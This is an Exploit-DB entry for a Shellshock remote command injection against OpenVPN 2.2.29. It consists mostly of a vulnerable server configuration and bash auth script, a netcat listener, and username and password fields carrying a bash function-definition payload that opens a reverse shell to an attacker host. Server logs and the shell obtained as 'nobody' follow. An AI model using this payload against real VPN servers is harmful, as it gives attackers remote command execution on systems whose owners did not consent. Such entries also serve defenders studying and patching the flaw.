OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection

EDB-ID:

34879

CVE:

2014-7910 2014-7227 2014-7196 2014-7169 2014-62771 2014-6271 2014-3671 2014-3659

EDB Verified:

Author:

hobbily plunt

Type:

remote

Exploit:   /  

Platform:

Linux

Date:

2014-10-04

Vulnerable App: 
# Exploit Title: ShellShock OpenVPN Exploit

# Date: Fri Oct  3 15:48:08 EDT 2014

# Exploit Author: hobbily AKA @fj33r

# Version: 2.2.29

# Tested on: Debian Linux

# CVE : CVE-2014-6271

#Probably should of submitted this the day I tweeted it.
### server.conf
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert testing.crt
key testing.key  # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3

### user.sh
#!/bin/bash
echo "$username"
echo "$password"

### start server
openvpn server.con

### terminal 1
nc -lp 4444

### terminal 2
sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo

### username && password were both shellshocked just incase
user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &

### log
Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:56:56 2014 GID set to nogroup
Mon Sep 29 20:56:56 2014 UID set to nobody
Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]
Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__

Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting

### nc listener
nobody@debian:/etc/openvpn$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
#shoutouts to Fredrik Str�mberg for the post he made on ycombinator
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services